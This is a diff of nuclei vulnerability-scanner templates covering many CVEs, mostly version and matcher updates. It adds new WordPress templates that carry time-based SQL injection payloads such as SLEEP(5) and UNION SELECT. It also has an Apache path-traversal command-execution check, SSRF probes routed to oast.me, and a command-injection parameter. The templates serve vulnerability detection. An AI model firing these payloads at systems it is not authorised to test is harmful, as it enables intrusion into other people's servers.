# digest: 4a0a00473045022100e340099dadc3710a63b8cc3e0182b0c1a738f7480c069fa5c39913092f31b39802201ad2dbae637d451dd3a442b8c8a7d2f0d5244240545b98ba4431a62241c66fa6:922c64590222798bb761d5b6d8e72950
|
|
@ -14,13 +14,15 @@ info:
|
||||||
- https://talosintelligence.com/vulnerability_reports/TALOS-2021-1274
|
- https://talosintelligence.com/vulnerability_reports/TALOS-2021-1274
|
||||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21805
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21805
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-21805
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-21805
|
||||||
|
- https://github.com/ARPSyndicate/cvemon
|
||||||
|
- https://github.com/ARPSyndicate/kenzer-templates
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
cvss-score: 9.8
|
cvss-score: 9.8
|
||||||
cve-id: CVE-2021-21805
|
cve-id: CVE-2021-21805
|
||||||
cwe-id: CWE-78
|
cwe-id: CWE-78
|
||||||
epss-score: 0.97374
|
epss-score: 0.97374
|
||||||
epss-percentile: 0.99892
|
epss-percentile: 0.99895
|
||||||
cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:*
|
cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:*
|
||||||
metadata:
|
metadata:
|
||||||
verified: true
|
verified: true
|
||||||
|
@ -52,4 +54,4 @@ http:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
# digest: 4a0a00473045022100f2a3e97b98df27aafb1f8001f577c595d1cbb4fed075db594314502fbf283bd602204b4e9e0d429dacbd3c7672f6fd16118bbc7e73d54077c27d333a19e89ac0f5db:922c64590222798bb761d5b6d8e72950
|
# digest: 490a004630440220239da739e577f078def3474254759fb447a0e1c7ae5e5c894fc15f3748b3752b022039afb1da09e145478b68a7981ab742ece2729a5f473a12d97e7c259b4bddafb6:922c64590222798bb761d5b6d8e72950
|
|
@ -21,7 +21,7 @@ info:
|
||||||
cve-id: CVE-2021-22873
|
cve-id: CVE-2021-22873
|
||||||
cwe-id: CWE-601
|
cwe-id: CWE-601
|
||||||
epss-score: 0.00922
|
epss-score: 0.00922
|
||||||
epss-percentile: 0.81209
|
epss-percentile: 0.82474
|
||||||
cpe: cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:*
|
cpe: cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:*
|
||||||
metadata:
|
metadata:
|
||||||
verified: true
|
verified: true
|
||||||
|
@ -49,4 +49,4 @@ http:
|
||||||
part: header
|
part: header
|
||||||
regex:
|
regex:
|
||||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
|
||||||
# digest: 490a0046304402206825e5ab8251fc139a7b9f7ac5b06687ca56ae1e65ed767ca11c20c7930c7e1f02205a2f6d3c6d66a885a07cd69568accc9951b72dc883ed9cc1f62f561083da2e0c:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a0047304502201f562b389b6a5f97abaafe839123249c8bfc49d20d8cc12c06a61ee23b840795022100e4d6049c15f40c1564d2e55b52873ca91a7030a85feb7605ebf54ce291e513d5:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,49 @@
|
||||||
|
id: CVE-2021-24442
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Wordpress Polls Widget < 1.5.3 - SQL Injection
|
||||||
|
author: ritikchaddha
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
The Poll, Survey, Questionnaire and Voting system WordPress plugin before 1.5.3 did not sanitise, escape or validate the date_answers[] POST parameter before using it in a SQL statement when sending a Poll result, allowing unauthenticated users to perform SQL Injection attacks
|
||||||
|
remediation: Fixed in 1.5.3
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/7376666e-9b2a-4239-b11f-8544435b444a/
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-24442
|
||||||
|
- https://wordpress.org/plugins/polls-widget/
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2021-24442
|
||||||
|
cwe-id: CWE-89
|
||||||
|
epss-score: 0.00212
|
||||||
|
epss-percentile: 0.58237
|
||||||
|
cpe: cpe:2.3:a:wpdevart:poll\,_survey\,_questionnaire_and_voting_system:*:*:*:*:*:wordpress:*:*
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 1
|
||||||
|
vendor: wpdevart
|
||||||
|
product: poll\,_survey\,_questionnaire_and_voting_system
|
||||||
|
framework: wordpress
|
||||||
|
publicwww-query: "/wp-content/plugins/polls-widget/"
|
||||||
|
tags: wpscan,cve,cve2021,wp,wp-plugin,wpscan,wordpress,polls-widget,sqli
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
@timeout: 25s
|
||||||
|
POST /wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||||
|
X-Forwarded-For: {{randstr}}
|
||||||
|
|
||||||
|
question_id=1&poll_answer_securety=8df73ed4ee&date_answers%5B0%5D=SLEEP(5)
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'duration>=5'
|
||||||
|
- 'status_code == 200'
|
||||||
|
- 'contains_all(body, "{\"answer_name", "vote\":")'
|
||||||
|
condition: and
|
||||||
|
# digest: 4a0a00473045022077e2d0f0096519c85cc2560e8aa0947b9480af46a12b487659284f2207bd7a13022100eff5ad69413aa6014c4fc03c62f75c9e69ec2e5bfb10908470a3f44c6bcecdff:922c64590222798bb761d5b6d8e72950
|
|
@ -1,7 +1,7 @@
|
||||||
id: CVE-2021-24762
|
id: CVE-2021-24762
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: WordPress Perfect Survey<1.5.2 - SQL Injection
|
name: WordPress Perfect Survey <1.5.2 - SQL Injection
|
||||||
author: cckuailong
|
author: cckuailong
|
||||||
severity: critical
|
severity: critical
|
||||||
description: |
|
description: |
|
||||||
|
@ -13,8 +13,8 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/50766
|
- https://www.exploit-db.com/exploits/50766
|
||||||
- https://github.com/cckuailong/reapoc/tree/main/2021/CVE-2021-24762/vultarget
|
- https://github.com/cckuailong/reapoc/tree/main/2021/CVE-2021-24762/vultarget
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24762
|
|
||||||
- https://wpscan.com/vulnerability/c1620905-7c31-4e62-80f5-1d9635be11ad
|
- https://wpscan.com/vulnerability/c1620905-7c31-4e62-80f5-1d9635be11ad
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-24762
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
cvss-score: 9.8
|
cvss-score: 9.8
|
||||||
|
@ -28,13 +28,13 @@ info:
|
||||||
vendor: getperfectsurvey
|
vendor: getperfectsurvey
|
||||||
product: perfect_survey
|
product: perfect_survey
|
||||||
framework: wordpress
|
framework: wordpress
|
||||||
tags: cve2021,cve,wpscan,sqli,wp,wordpress,wp-plugin,unauth,edb,getperfectsurvey
|
tags: cve2021,cve,wpscan,sqli,wp,wordpress,wp-plugin,edb,getperfectsurvey
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
@timeout: 15s
|
@timeout: 15s
|
||||||
POST /wp-admin/admin-ajax.php?action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(7)))HQYx) HTTP/1.1
|
GET /wp-admin/admin-ajax.php?action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(7)))HQYx) HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
|
@ -51,4 +51,4 @@ http:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 404
|
- 404
|
||||||
# digest: 4b0a00483046022100dc31a17605a60d5af3be547b7336024caf4ab4335ca417a63422a3bcc4bbb8b6022100b2d7e5fce40df099911318ad66b154d1f69a76338f56107dc6284b6c231579ad:922c64590222798bb761d5b6d8e72950
|
# digest: 4b0a0048304602210088b2f8641efb17289d0c9fa1e0fc57697b83b89f2c710a54603d6e0536009441022100c2ca459924277032aeae17d881fd19c80a6e3501bb3ff5be948390480bec353d:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,70 @@
|
||||||
|
id: CVE-2021-24849
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: WCFM WooCommerce Multivendor Marketplace < 3.4.12 - SQL Injection
|
||||||
|
author: ritikchaddha
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
The wcfm_ajax_controller AJAX action of the WCFM Marketplace WordPress plugin before 3.4.12, available to unauthenticated and authenticated user, does not properly sanitise multiple parameters before using them in SQL statements, leading to SQL injections.
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/763c08a0-4b2b-4487-b91c-be6cc2b9322e/
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-24849
|
||||||
|
- https://wordpress.org/plugins/wc-multivendor-marketplace/
|
||||||
|
remediation: Fixed in 3.4.12
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2021-24849
|
||||||
|
cwe-id: CWE-89
|
||||||
|
cpe: cpe:2.3:a:wclovers:frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible:*:*:*:*:*:wordpress:*:*
|
||||||
|
epss-score: 0.00199
|
||||||
|
epss-percentile: 0.56492
|
||||||
|
metadata:
|
||||||
|
product: "frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible"
|
||||||
|
framework: wordpress
|
||||||
|
publicwww-query: "/wp-content/plugins/wc-multivendor-marketplace"
|
||||||
|
verified: true
|
||||||
|
max-request: 3
|
||||||
|
vendor: wclovers
|
||||||
|
tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,wc-multivendor-marketplace,wpscan,sqli
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /wp-content/plugins/wc-multivendor-marketplace/readme.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- status_code == 200
|
||||||
|
- contains(body, "WCFM Marketplace - Best Multivendor Marketplace for WooCommerce")
|
||||||
|
condition: and
|
||||||
|
internal: true
|
||||||
|
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
@timeout: 20s
|
||||||
|
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
{{post_data}}
|
||||||
|
|
||||||
|
payloads:
|
||||||
|
post_data:
|
||||||
|
- "action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1+union+select+1+and+sleep(5)--"
|
||||||
|
- "action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1&orderby=ID`%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)--%20`"
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'duration>=5'
|
||||||
|
- 'status_code == 200'
|
||||||
|
- 'contains(header, "application/json")'
|
||||||
|
- 'contains(body, "success")'
|
||||||
|
condition: and
|
||||||
|
# digest: 4a0a00473045022100ef54cd087054515b6ef2f1935d258ecea55b3abf384cd95798b8cd351a5f1fe90220070a59d1e5a3ab49e8fc248e2ddc238e33958d75f7b3cfc5700b5018b8116f82:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,51 @@
|
||||||
|
id: CVE-2021-24943
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Registrations for the Events Calendar < 2.7.6 - SQL Injection
|
||||||
|
author: ritikchaddha
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
The Registrations for the Events Calendar WordPress plugin before 2.7.6 does not sanitise and escape the event_id in the rtec_send_unregister_link AJAX action (available to both unauthenticated and authenticated users) before using it in a SQL statement, leading to an unauthenticated SQL injection.
|
||||||
|
remediation: Fixed in 2.7.6
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/ba50c590-42ee-4523-8aa0-87ac644b77ed/
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-24943
|
||||||
|
- https://wordpress.org/plugins/registrations-for-the-events-calendar/
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2021-24943
|
||||||
|
cwe-id: CWE-89
|
||||||
|
epss-score: 0.00199
|
||||||
|
epss-percentile: 0.56492
|
||||||
|
cpe: cpe:2.3:a:roundupwp:registrations_for_the_events_calendar:*:*:*:*:*:wordpress:*:*
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 1
|
||||||
|
vendor: roundupwp
|
||||||
|
product: registrations_for_the_events_calendar
|
||||||
|
framework: wordpress
|
||||||
|
publicwww-query: "/wp-content/plugins/registrations-for-the-events-calendar/"
|
||||||
|
tags: wpscan,cve,cve2021,wp,wp-plugin,wpscan,wordpress,sqli,registrations-for-the-events-calendar
|
||||||
|
|
||||||
|
variables:
|
||||||
|
text: "{{rand_base(5)}}"
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
@timeout: 20s
|
||||||
|
POST /wp-admin/admin-ajax.php?action=rtec_send_unregister_link HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||||
|
|
||||||
|
event_id=3 AND (SELECT 1874 FROM (SELECT(SLEEP(5)))vNpy)&email={{text}}@{{text}}.com
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'duration>=5'
|
||||||
|
- 'status_code == 200'
|
||||||
|
- 'contains(body, "Please enter the email you registered with")'
|
||||||
|
condition: and
|
||||||
|
# digest: 490a0046304402205fdda9c8d4779e2557fe7c639bac3b8efca15af2034265114daf03628ab5e8f90220450c244cc25345ee7065bcecb32ae6c7b1e33cc7bd263a94334969d729692ca7:922c64590222798bb761d5b6d8e72950
|
|
@ -18,13 +18,14 @@ info:
|
||||||
cve-id: CVE-2021-27748
|
cve-id: CVE-2021-27748
|
||||||
metadata:
|
metadata:
|
||||||
verified: true
|
verified: true
|
||||||
max-request: 2
|
max-request: 3
|
||||||
shodan-query: http.html:"IBM WebSphere Portal"
|
shodan-query: http.html:"IBM WebSphere Portal"
|
||||||
tags: cve2021,cve,hcl,ibm,ssrf,websphere
|
tags: cve2021,cve,hcl,ibm,ssrf,websphere
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
|
- '{{BaseURL}}'
|
||||||
- '{{BaseURL}}/docpicker/internal_proxy/http/oast.me'
|
- '{{BaseURL}}/docpicker/internal_proxy/http/oast.me'
|
||||||
- '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/oast.me'
|
- '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/oast.me'
|
||||||
|
|
||||||
|
@ -35,10 +36,13 @@ http:
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
|
part: body
|
||||||
words:
|
words:
|
||||||
- "Interactsh Server"
|
- "Interactsh Server"
|
||||||
|
|
||||||
- type: status
|
- type: word
|
||||||
status:
|
part: body_1
|
||||||
- 200
|
words:
|
||||||
# digest: 4b0a00483046022100b6134f89233da535e75fb3d2abac8b55797ec0997bc234ba4559b250efcc3489022100c2cce298030c3efdccc4e809925e7d77d72aab31f1de74f9c86ab5ae022b0a1e:922c64590222798bb761d5b6d8e72950
|
- "Interactsh Server"
|
||||||
|
negative: true
|
||||||
|
# digest: 490a0046304402200ba3597e1cd51ea49029981ba317f0f962cc8082d2f3796e4d59fc9138bf9d9d0220226c8cb7207a0c85488b5ce96a38f6e0b616ebb9b487135b1fda864f9d6503d2:922c64590222798bb761d5b6d8e72950
|
|
@ -18,8 +18,8 @@ info:
|
||||||
cwe-id: CWE-22
|
cwe-id: CWE-22
|
||||||
cpe: cpe:2.3:a:os4ed:opensis:8.0:*:*:*:community:*:*:*
|
cpe: cpe:2.3:a:os4ed:opensis:8.0:*:*:*:community:*:*:*
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
shodan-query: "title:\"openSIS\""
|
||||||
shodan-query: title:"openSIS"
|
max-request: 2
|
||||||
tags: cve,cve2021,lfi,os4ed,opensis,authenticated
|
tags: cve,cve2021,lfi,os4ed,opensis,authenticated
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
@ -42,4 +42,4 @@ http:
|
||||||
- 'contains(body_1, "openSIS")'
|
- 'contains(body_1, "openSIS")'
|
||||||
- "status_code == 200"
|
- "status_code == 200"
|
||||||
condition: and
|
condition: and
|
||||||
# digest: 490a004630440220206394b303ab92ce65590e2c61e6eb5e9914219a5a0651ae69009a3f224109ff02207e729d1c062d3bd2e445a39a036992cc281564407a764e7f7ced5f02879f1034:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a00473045022100924b4c785059886c8131bde539e1106c1be30952a7fea88bd992cb9cc3e7aca202204c4c3c880b323df6c23378c766e00dd0222716aa49f384cbc8f4c37b7c9ab38f:922c64590222798bb761d5b6d8e72950
|
|
@ -1,4 +1,4 @@
|
||||||
id: "CVE-2021-42013"
|
id: CVE-2021-42013
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Apache 2.4.49/2.4.50 - Path Traversal and Remote Code Execution
|
name: Apache 2.4.49/2.4.50 - Path Traversal and Remote Code Execution
|
||||||
|
@ -30,7 +30,7 @@ info:
|
||||||
product: http_server
|
product: http_server
|
||||||
tags: cve2021,cve,lfi,apache,rce,misconfig,traversal,kev
|
tags: cve2021,cve,lfi,apache,rce,misconfig,traversal,kev
|
||||||
variables:
|
variables:
|
||||||
cmd: "echo COP-37714-1202-EVC | rev"
|
cmd: "echo 31024-1202-EVC | rev"
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
|
@ -66,4 +66,4 @@ http:
|
||||||
name: LFI
|
name: LFI
|
||||||
regex:
|
regex:
|
||||||
- "root:.*:0:0:"
|
- "root:.*:0:0:"
|
||||||
# digest: 4a0a0047304502210090df2d0b0784bca0957316b00eda4a86eff7538dafa59481ce77ae33976454a0022052bca4f8bcc25e748dd8ed529bba9efc648ebfa54c19b8177f9c0c4fc2da6858:922c64590222798bb761d5b6d8e72950
|
# digest: 490a0046304402207470f1e0707171ed23b51282f56448b47cde756e37792253a19e6abc7c6a2b2b02203d6616b33eca925f272433a727bd685d8173454004fe09a7a6cdedc6daffb2a6:922c64590222798bb761d5b6d8e72950
|
|
@ -10,7 +10,7 @@ info:
|
||||||
- https://github.com/chillzhuang/blade-tool
|
- https://github.com/chillzhuang/blade-tool
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 3
|
max-request: 3
|
||||||
tags: cve,cve2023,springblade,blade,info-leak
|
tags: cve,cve2021,springblade,blade,info-leak
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
|
@ -44,4 +44,4 @@ http:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
# digest: 490a004630440220304c9e6f27e05f7a603b614d229e59b893ef58d1528c62bd920706d9791db8d60220587079c49206fcc78d95924e9f27e54f38142ba541eb9ab46393425965a88263:922c64590222798bb761d5b6d8e72950
|
# digest: 4b0a00483046022100b8965db2f12da5b92605ff6a2c1e8b8968f42d7d31259e428c54abd9c342066e02210098f2e2b339dcd515081900537d59c694775232efa61957cfe2944fc5c159c9db:922c64590222798bb761d5b6d8e72950
|
|
@ -21,7 +21,7 @@ info:
|
||||||
cve-id: CVE-2022-0776
|
cve-id: CVE-2022-0776
|
||||||
cwe-id: CWE-79
|
cwe-id: CWE-79
|
||||||
epss-score: 0.001
|
epss-score: 0.001
|
||||||
epss-percentile: 0.40832
|
epss-percentile: 0.40075
|
||||||
cpe: cpe:2.3:a:revealjs:reveal.js:*:*:*:*:*:node.js:*:*
|
cpe: cpe:2.3:a:revealjs:reveal.js:*:*:*:*:*:node.js:*:*
|
||||||
metadata:
|
metadata:
|
||||||
vendor: revealjs
|
vendor: revealjs
|
||||||
|
@ -48,4 +48,4 @@ headless:
|
||||||
part: extract
|
part: extract
|
||||||
words:
|
words:
|
||||||
- "true"
|
- "true"
|
||||||
# digest: 4a0a00473045022015776ab1f8ee5f7cbd078059bc34167a0b8ca0a11a1bda34723f7ec03d31b6c302210098d1c6a54ecbafb3158390aea2498590fe70df9d78d3266d388274859a641533:922c64590222798bb761d5b6d8e72950
|
# digest: 4b0a00483046022100822f5151d594a59ff99bde533919eb403ddd05ab8d041ea5963a1c88f81d84320221008c8e17c078665f80ff1f6815e2f071996a8d9e4712b43e3bf775f0c2db3e0e12:922c64590222798bb761d5b6d8e72950
|
|
@ -28,7 +28,7 @@ info:
|
||||||
vendor: automattic
|
vendor: automattic
|
||||||
product: sensei_lms
|
product: sensei_lms
|
||||||
framework: wordpress
|
framework: wordpress
|
||||||
tags: cve,cve2022,wp,disclosure,wpscan,sensei-lms,brute-force,hackerone,wordpress,wp-plugin,automattic
|
tags: cve,cve2022,wp,disclosure,wpscan,sensei-lms,bruteforce,hackerone,wordpress,wp-plugin,automattic
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
@ -56,4 +56,4 @@ http:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
# digest: 490a0046304402201f56469497c402e5060dd148bc20614451e7dca2ff2a02ed0137deb3c983730102203aef693927819b4ac18f1f31b55f4799f6de8c2477e411a36515df9dba050dc5:922c64590222798bb761d5b6d8e72950
|
# digest: 490a0046304402207c51a21553085f96246b9b7a7b8fcb17455c8ede92140fc56ac74b94c60b3fcf022054295c2dbda0cd3975caa9c8ac89cd1d99b8f237e8fe3258e096d29e53f99f61:922c64590222798bb761d5b6d8e72950
|
|
@ -22,7 +22,7 @@ info:
|
||||||
cve-id: CVE-2022-26263
|
cve-id: CVE-2022-26263
|
||||||
cwe-id: CWE-79
|
cwe-id: CWE-79
|
||||||
epss-score: 0.00147
|
epss-score: 0.00147
|
||||||
epss-percentile: 0.50638
|
epss-percentile: 0.49633
|
||||||
cpe: cpe:2.3:a:yonyou:u8\+:13.0:*:*:*:*:*:*:*
|
cpe: cpe:2.3:a:yonyou:u8\+:13.0:*:*:*:*:*:*:*
|
||||||
metadata:
|
metadata:
|
||||||
verified: true
|
verified: true
|
||||||
|
@ -43,4 +43,4 @@ headless:
|
||||||
- '<frame src="javascript:console.log(document.domain)"'
|
- '<frame src="javascript:console.log(document.domain)"'
|
||||||
- 'webhelp4.js'
|
- 'webhelp4.js'
|
||||||
condition: and
|
condition: and
|
||||||
# digest: 4a0a00473045022100a72f95b8648b73eb2e4cf2ea58e09902bdd87b68ed16d6258763f77029657162022064b391ae3ee631c189007bc15526ede89c3be32159ec215d129a1840544b297e:922c64590222798bb761d5b6d8e72950
|
# digest: 4b0a00483046022100c124eb614790888649b3ad794123f8a4d5127efb6b3dfcccc25a1431ae2dd660022100bdd24ef15743a8543fc37ed7a7e4a0399762873c6016d5cd6a811baa514a747d:922c64590222798bb761d5b6d8e72950
|
|
@ -22,7 +22,7 @@ info:
|
||||||
cve-id: CVE-2022-30776
|
cve-id: CVE-2022-30776
|
||||||
cwe-id: CWE-79
|
cwe-id: CWE-79
|
||||||
epss-score: 0.00112
|
epss-score: 0.00112
|
||||||
epss-percentile: 0.44504
|
epss-percentile: 0.43631
|
||||||
cpe: cpe:2.3:a:atmail:atmail:6.5.0:*:*:*:*:*:*:*
|
cpe: cpe:2.3:a:atmail:atmail:6.5.0:*:*:*:*:*:*:*
|
||||||
metadata:
|
metadata:
|
||||||
verified: true
|
verified: true
|
||||||
|
@ -52,4 +52,4 @@ http:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
# digest: 4a0a0047304502203171cb9a5a9125732f06bba74b71efc2e09ae7c92ad33bcca6e6356b5d541fe702210081422e4791a4a926b08807deffab9bf4cb8eab98c0f9897922d586b01218bf06:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a0047304502210098e7e92637618d4c3c5540938565842f9d2479c1b7a7ca9a9333b2e0bf64a29b022077e0d1d54bd671842a9ba69fdbad1ed67e8c6f085c3235fde69b2d9e18009833:922c64590222798bb761d5b6d8e72950
|
|
@ -37,7 +37,7 @@ variables:
|
||||||
http:
|
http:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/doAs?=`{{url_encode("{{command}}")}}`'
|
- '{{BaseURL}}/?doAs=`{{url_encode("{{command}}")}}`'
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -45,4 +45,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
words:
|
words:
|
||||||
- "19833-2202-EVC"
|
- "19833-2202-EVC"
|
||||||
# digest: 4a0a004730450221008bb8dca83860e99f6649206e34e12203a4ef600bbafcd7ae6b135b537faab9990220205c3ed10d667efd9a2e7f2128c855334fab697f0bf55bf5792362c774f88c91:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a00473045022100c1235eac532c6d726073650001ee75a510e3d2b869c6174b06e4a249f1d236090220564440e9e87fc5f90b25cfc4108c5aa04b592bc0e6c584c01fec85b312622f08:922c64590222798bb761d5b6d8e72950
|
|
@ -6,28 +6,29 @@ info:
|
||||||
severity: medium
|
severity: medium
|
||||||
description: |
|
description: |
|
||||||
RStudio Connect prior to 2023.01.0 is affected by an Open Redirect issue. The vulnerability could allow an attacker to redirect users to malicious websites.
|
RStudio Connect prior to 2023.01.0 is affected by an Open Redirect issue. The vulnerability could allow an attacker to redirect users to malicious websites.
|
||||||
impact: |
|
|
||||||
An attacker can exploit the vulnerability to redirect users to malicious websites, potentially leading to phishing attacks or other security breaches.
|
|
||||||
remediation: |
|
|
||||||
This issue is fixed in Connect v2023.05. Additionally, for users running Connect v1.7.2 and later, the issue is resolvable via a configuration setting mentioned in the support article.
|
|
||||||
reference:
|
reference:
|
||||||
- https://tenable.com/security/research/tra-2022-30
|
- https://tenable.com/security/research/tra-2022-30
|
||||||
- https://support.posit.co/hc/en-us/articles/10983374992023-CVE-2022-38131-configuration-issue-in-Posit-Connect
|
- https://support.posit.co/hc/en-us/articles/10983374992023-CVE-2022-38131-configuration-issue-in-Posit-Connect
|
||||||
- https://github.com/JoshuaMart/JoshuaMart
|
- https://github.com/JoshuaMart/JoshuaMart
|
||||||
|
impact: |
|
||||||
|
An attacker can exploit the vulnerability to redirect users to malicious websites, potentially leading to phishing attacks or other security breaches.
|
||||||
|
remediation: |
|
||||||
|
This issue is fixed in Connect v2023.05. Additionally, for users running Connect v1.7.2 and later, the issue is resolvable via a configuration setting mentioned in the support article.
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
cvss-score: 6.1
|
cvss-score: 6.1
|
||||||
cve-id: CVE-2022-38131
|
cve-id: CVE-2022-38131
|
||||||
cwe-id: CWE-601
|
cwe-id: CWE-601
|
||||||
|
cpe: cpe:2.3:a:rstudio:connect:*:*:*:*:*:*:*:*
|
||||||
epss-score: 0.0006
|
epss-score: 0.0006
|
||||||
epss-percentile: 0.23591
|
epss-percentile: 0.23591
|
||||||
